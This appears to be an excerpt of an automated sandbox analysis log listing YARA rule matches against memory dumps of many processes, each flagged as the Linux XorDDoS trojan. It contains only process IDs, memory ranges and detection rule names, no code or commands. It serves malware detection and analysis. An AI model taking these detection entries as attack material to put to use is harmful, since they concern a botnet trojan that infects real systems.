Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
